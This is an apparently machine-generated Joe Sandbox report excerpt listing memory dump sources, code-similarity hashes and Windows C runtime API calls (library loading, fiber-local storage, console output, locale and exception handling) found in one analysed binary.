                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: f$p$p
                                                                                  • API String ID: 3215553584-1995029353
                                                                                  • Opcode ID: dec70707f6924979680810ea5ec79d9b498a17b86748ca286f0cf39edf5d9672
                                                                                  • Instruction ID: ff9fa6581a79996804d847a012c1fc7a1588c7534e2bdd38a378723715baae48
                                                                                  • Opcode Fuzzy Hash: dec70707f6924979680810ea5ec79d9b498a17b86748ca286f0cf39edf5d9672
                                                                                  • Instruction Fuzzy Hash: F412A72AA0C143A6FB64FB18E046679F652FBA0754FC64175E689476C4EF3CF440BB22
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm$|~fqVG
                                                                                  • API String ID: 3523768491-748751075
                                                                                  • Opcode ID: b8e5615955f7dc2eb55b848d6ff6062bcaa0ce4322343a125c005f31dd50ef8c
                                                                                  • Instruction ID: f5a28d8499a4dff796a6182e7d563be0debb30d181e6b582982a4f1ca9e07095
                                                                                  • Opcode Fuzzy Hash: b8e5615955f7dc2eb55b848d6ff6062bcaa0ce4322343a125c005f31dd50ef8c
                                                                                  • Instruction Fuzzy Hash: 37E1B07A9296839AFF10AF24D4822BDB7A0EB44748F900179DE8D57696CF3CE481DB10
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: f691b260bc46caa059fc1d59d9bd43d62ef92d00f3645d7fa93bfa92697d6b14
                                                                                  • Instruction ID: 5e75a30ee554a933a17e990dc9ac4f5b61d74f2a1a23ceea0604bb125059496c
                                                                                  • Opcode Fuzzy Hash: f691b260bc46caa059fc1d59d9bd43d62ef92d00f3645d7fa93bfa92697d6b14
                                                                                  • Instruction Fuzzy Hash: 98C1E52A90CA8665F6A1EB1895422BDFB51FF92B80FD70171DA4D03391CE7CE845B363
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: |~fqVG$|~fqVG$|~fqVG$|~fqVG$|~fqVG
                                                                                  • API String ID: 3215553584-4234897388
                                                                                  • Opcode ID: b7429684dfb0a50d99e81f109de8a6008f2f118e748ad483968e84c9f802f125
                                                                                  • Instruction ID: 4c2f79e9621e51f23abcb3f4b9c216df27acf8981b22f2846803a93492b23f07
                                                                                  • Opcode Fuzzy Hash: b7429684dfb0a50d99e81f109de8a6008f2f118e748ad483968e84c9f802f125
                                                                                  • Instruction Fuzzy Hash: EE61B53AD1D646A1FA64FB2C964213AF6E0FF94740F9345B5DA0E13794DE3CE841B222
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF73A3FD79E,?,?,?,00007FF73A3FD3EC,?,?,?,00007FF73A3F9E59), ref: 00007FF73A3FD571
                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF73A3FD79E,?,?,?,00007FF73A3FD3EC,?,?,?,00007FF73A3F9E59), ref: 00007FF73A3FD57F
                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF73A3FD79E,?,?,?,00007FF73A3FD3EC,?,?,?,00007FF73A3F9E59), ref: 00007FF73A3FD5A9
                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF73A3FD79E,?,?,?,00007FF73A3FD3EC,?,?,?,00007FF73A3F9E59), ref: 00007FF73A3FD617
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF73A3FD79E,?,?,?,00007FF73A3FD3EC,?,?,?,00007FF73A3F9E59), ref: 00007FF73A3FD623
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 2559590344-2084034818
                                                                                  • Opcode ID: d8e360d3a3f465031357ae92f49d5ddd019760dd9654fcee9edd8a148cf45f4c
                                                                                  • Instruction ID: 55a68f26c20bc505ba1f0ef5ac38af13b2a9cf0a897f86d706e11ba72f23f1ab
                                                                                  • Opcode Fuzzy Hash: d8e360d3a3f465031357ae92f49d5ddd019760dd9654fcee9edd8a148cf45f4c
                                                                                  • Instruction Fuzzy Hash: 7A312A35B2B643A2FE22BB06A805174A394BF14BA8FD90278DD1D07394EF3CE404A320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                  • String ID: CONOUT$
                                                                                  • API String ID: 3230265001-3130406586
                                                                                  • Opcode ID: f25c2d8c593b11f8c83384468c2dd056456f1e66f8aabcddf9c567de3769352b
                                                                                  • Instruction ID: 66c5b7e626b14eb13ce59df5fae91239d672a4b697324f706afb97e8943676c3
                                                                                  • Opcode Fuzzy Hash: f25c2d8c593b11f8c83384468c2dd056456f1e66f8aabcddf9c567de3769352b
                                                                                  • Instruction Fuzzy Hash: 9A11D365B18A8182F750AF0BF845329F6A0FB98FE4F954274EA1E83794CF3CD5049750
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404AB3
                                                                                  • FlsSetValue.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404AE9
                                                                                  • FlsSetValue.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404B16
                                                                                  • FlsSetValue.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404B27
                                                                                  • FlsSetValue.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404B38
                                                                                  • SetLastError.KERNEL32(?,?,0000475671667E7C,00007FF73A4006B1,?,?,?,?,00007FF73A40A0B6,?,?,00000000,00007FF73A400CCF,?,?,?), ref: 00007FF73A404B53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 2506987500-0
                                                                                  • Opcode ID: 183ea4b654a2927cb57ff5b6e312d1b252af88a8218432f9fc1c8a049c828961
                                                                                  • Instruction ID: 0534289fceff33880149570e56d36ca82475b558699312cfe7b24ca81179134b
                                                                                  • Opcode Fuzzy Hash: 183ea4b654a2927cb57ff5b6e312d1b252af88a8218432f9fc1c8a049c828961
                                                                                  • Instruction Fuzzy Hash: E711812CF0C28261FA14F32DA557139E1529FA47B0F8207B5D97E07AC6DEACA4407632
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2718003287-3303519982
                                                                                  • Opcode ID: c9748ac32c1102b20c7c6c1123d5a4a5edcc360f79a124e8f5ea6fbe1a7d5f71
                                                                                  • Instruction ID: bcab0d8465ce99bf59f6f570f10fec21dbff92de5c88825c3ad441fc6ef0af3c
                                                                                  • Opcode Fuzzy Hash: c9748ac32c1102b20c7c6c1123d5a4a5edcc360f79a124e8f5ea6fbe1a7d5f71
                                                                                  • Instruction Fuzzy Hash: F3D13176B08A8199F711DF78C4412ECB7B1FB54B98B958275CE4E97B89CE38D006E312
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC$|~fqVG
                                                                                  • API String ID: 3544855599-1735612089
                                                                                  • Opcode ID: 30b907a34009c3924f1289ebb5dfadb100318b6469519c0968d5c3143115a71d
                                                                                  • Instruction ID: 60f9bf1f23658f3676331509b7047b9cda07346d17d07a7b906ce16458a2fb81
                                                                                  • Opcode Fuzzy Hash: 30b907a34009c3924f1289ebb5dfadb100318b6469519c0968d5c3143115a71d
                                                                                  • Instruction Fuzzy Hash: 579104B7A197829AFB10EF64E8412ADB7A0FB44788F50413AEE8C17755DF38D195DB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 2138705365-3303519982
                                                                                  • Opcode ID: 89188d226876ff831ad9afe282e06b0276ff154876618beabad931a82bcd60cb
                                                                                  • Instruction ID: 2a3bff73e5e4b177f1795c7acaee116023e728e0ce4b6d404351458f08fb7d63
                                                                                  • Opcode Fuzzy Hash: 89188d226876ff831ad9afe282e06b0276ff154876618beabad931a82bcd60cb
                                                                                  • Instruction Fuzzy Hash: E251E966A29BC291FE10DB24E4423A9E361FB99794F909335EB9C02B99DF3CD4C4D710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                  • String ID: bad locale name
                                                                                  • API String ID: 2967684691-1405518554
                                                                                  • Opcode ID: 3d6d4fad8a00866f6e3c776309861b3f13548d4d884e2ecd0977807a0c359330
                                                                                  • Instruction ID: 963c3aad1d162cbcfcf96f97006eafd02f3375bc5c94ec2f2230e38a07e6d1a3
                                                                                  • Opcode Fuzzy Hash: 3d6d4fad8a00866f6e3c776309861b3f13548d4d884e2ecd0977807a0c359330
                                                                                  • Instruction Fuzzy Hash: 7C41922AB1AB42AAFF10EB70D4522BC6374AF40744F8444B9DF4E27A55DF38D556E320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: a92427a8a7a94bc3e110f6083a1c86e9f30f9f999ec61db51a8263dfc59daad0
                                                                                  • Instruction ID: 09e3001d194f67f109d0e435e79387c279391774ece2bd888a1c9e0d71eb0f9e
                                                                                  • Opcode Fuzzy Hash: a92427a8a7a94bc3e110f6083a1c86e9f30f9f999ec61db51a8263dfc59daad0
                                                                                  • Instruction Fuzzy Hash: BFF0C8A9B1870661FB14AB1CF446339E360AF597A0FE50275C96D051E4CF2CD044E720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: d23c261393fe5d9345011d4d8cae44813ade9e9095501f5385085d884223d958
                                                                                  • Instruction ID: 1355cf661f3880b229c2cb15361b16520e85db26802d3097adb2e25b34f3c0fa
                                                                                  • Opcode Fuzzy Hash: d23c261393fe5d9345011d4d8cae44813ade9e9095501f5385085d884223d958
                                                                                  • Instruction Fuzzy Hash: FCB10329E2B643A1FE65BB119442639E7A0AF44FC4F8984BDDE4D07785DF3CE442A360
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _set_statfp
                                                                                  • String ID:
                                                                                  • API String ID: 1156100317-0
                                                                                  • Opcode ID: 5785710400c8fee3bac2d009e2e74cd863281d11c80b40594c2ba0b0a5132646
                                                                                  • Instruction ID: d80eb955dfdcf89c46cc0123e96e7d9b1dbadbd47e84dab7f7aa34a84b5772d4
                                                                                  • Opcode Fuzzy Hash: 5785710400c8fee3bac2d009e2e74cd863281d11c80b40594c2ba0b0a5132646
                                                                                  • Instruction Fuzzy Hash: E711C47AE0CA07A1F654376CE453375C0407F95370FAB06B8E96E063D6AE2CA8C67224
                                                                                  APIs
                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF73A3FF3EB,?,?,00000000,00007FF73A3FF686,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A404B8B
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF73A3FF3EB,?,?,00000000,00007FF73A3FF686,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A404BAA
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF73A3FF3EB,?,?,00000000,00007FF73A3FF686,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A404BD2
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF73A3FF3EB,?,?,00000000,00007FF73A3FF686,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A404BE3
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF73A3FF3EB,?,?,00000000,00007FF73A3FF686,?,?,?,?,?,00007FF73A3FF612), ref: 00007FF73A404BF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 70f740f3023a92d3b8a35c9147fc4d3e48c9d5d0f5abb6972c87376f9b4a82fe
                                                                                  • Instruction ID: 2756cb0964f4d71eabd4e87fce3ab430c61bcf16fcb6490d274389d8127058f5
                                                                                  • Opcode Fuzzy Hash: 70f740f3023a92d3b8a35c9147fc4d3e48c9d5d0f5abb6972c87376f9b4a82fe
                                                                                  • Instruction Fuzzy Hash: C611AF28E0C24261FA58F32DA553139E1529F903B0F8747B5D53E0B6D6DE6CE441B632
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: a7b3d1736a5456aa3531299a47ac971f4219bb52a0d3bc5effd8ecf20bbcc0c1
                                                                                  • Instruction ID: de5d8c23db890dc0c7502f45a261a7abd3c97f60e5bf88d07e82d9c78678aaec
                                                                                  • Opcode Fuzzy Hash: a7b3d1736a5456aa3531299a47ac971f4219bb52a0d3bc5effd8ecf20bbcc0c1
                                                                                  • Instruction Fuzzy Hash: AD11F11CE0D20761F958F2BD6413179E1425F64370E964BB9D93E0A2C2DDACB4817676
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                  • API String ID: 3215553584-1196891531
                                                                                  • Opcode ID: 38d272e447d5746b0ee3b6a85f6e63384077e4b6069fc838a17b2a89ee85e727
                                                                                  • Instruction ID: ca7056f34dbbaa6b4b6affdc112f0ab15035fe16c0c64f47724d7d4efc226213
                                                                                  • Opcode Fuzzy Hash: 38d272e447d5746b0ee3b6a85f6e63384077e4b6069fc838a17b2a89ee85e727
                                                                                  • Instruction Fuzzy Hash: AF81B23AD0C242A5F779EE2C8252239EB909F12744FD750B5CA0D57397CA1DE801B723
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 2395640692-1018135373
                                                                                  • Opcode ID: d73933c8cc523cdd2746a819842a37e00f423e6638d35d2228c426cfb4e16dea
                                                                                  • Instruction ID: 610043e121519078d5995047d48833c2d9d2277b84223b0df1182b7d2094edb7
                                                                                  • Opcode Fuzzy Hash: d73933c8cc523cdd2746a819842a37e00f423e6638d35d2228c426cfb4e16dea
                                                                                  • Instruction Fuzzy Hash: 1F51E136A2A603AAFF14AF15E405A38F391FB44B88F904179EA4D43388DF3DE8419710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
